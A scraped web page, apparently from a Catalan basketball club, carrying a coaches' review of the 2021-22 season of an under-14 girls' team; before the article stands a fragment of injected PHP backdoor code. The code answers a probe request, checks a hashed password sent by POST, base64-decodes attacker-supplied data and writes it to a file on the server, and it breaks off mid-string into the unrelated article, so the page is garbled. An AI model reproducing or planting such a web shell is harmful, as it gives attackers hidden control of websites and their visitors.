function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El balanç de la temporada 21/22 de l'Infantil femení 08B Inter -

El balanç de la temporada 21/22 de l’Infantil femení 08B Inter

By
Updated: juny 27, 2022

El cos tècnic de l’Infantil femení 08B Inter encapçalat pel Sergi Robert i la Laura Cattarin fa balaç de la temporada 2021-2022.

Ha sigut una temporada on ens estrenàvem a una categoria superior ja de nivell català que era nova per totes i on hem complert els objectius que vam proposar a l’agost quan vam començar a entrenar; competir tots els partits al màxim i que l’equip tingués una evolució important a nivell individual i col.lectiu. Vam començar 0-3 i força irregulars (degut a la falta d’experiència en partits d’exigència i amb marcadors ajustats, però a poc a poc i amb molt de treball de les jugadores vam poder anar creixent i amb una gran segona volta vam quedar cinquenes a una victòria de la segona posició i perdent de 5 contra el Barça, equip que a posteriori ha quedat subcampió de la competició.

Després vam tenir un molt bon Torneig de Cambrils, on les jugadores van gaudir molt i vam poder jugar contra equips de categoria superior com el Viladecans, Sant Nicolau o el mateix TGN A on vam quedar quartes per darrere aquests equips.

Després d’aquesta tradicional competició, vam jugar la fase final on vam tenir al grup l’equip que acabaria guanyant la lliga l’Artesa de Segre, el Reus Deportiu (que ja havíem jugat contra elles també al nostre grup) i el Círcol de Badalona. Uns dos mals partits contra Reus ens van fer quedar en 3a posició amb un regust agredolç i vam acabar jugant la final a 4 on vam quedar desenes.

En resum: un molt bon any de l’equip, amb molta millora a tots els nivells, on el que estem més contents el cos tècnic, és amb el grup i la pinya que s’ha fet. Ha estat un veritable luxe portar aquest equip i estic segur que ens continuaran portant moltes alegries. Sou 100% #ADNTGN

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *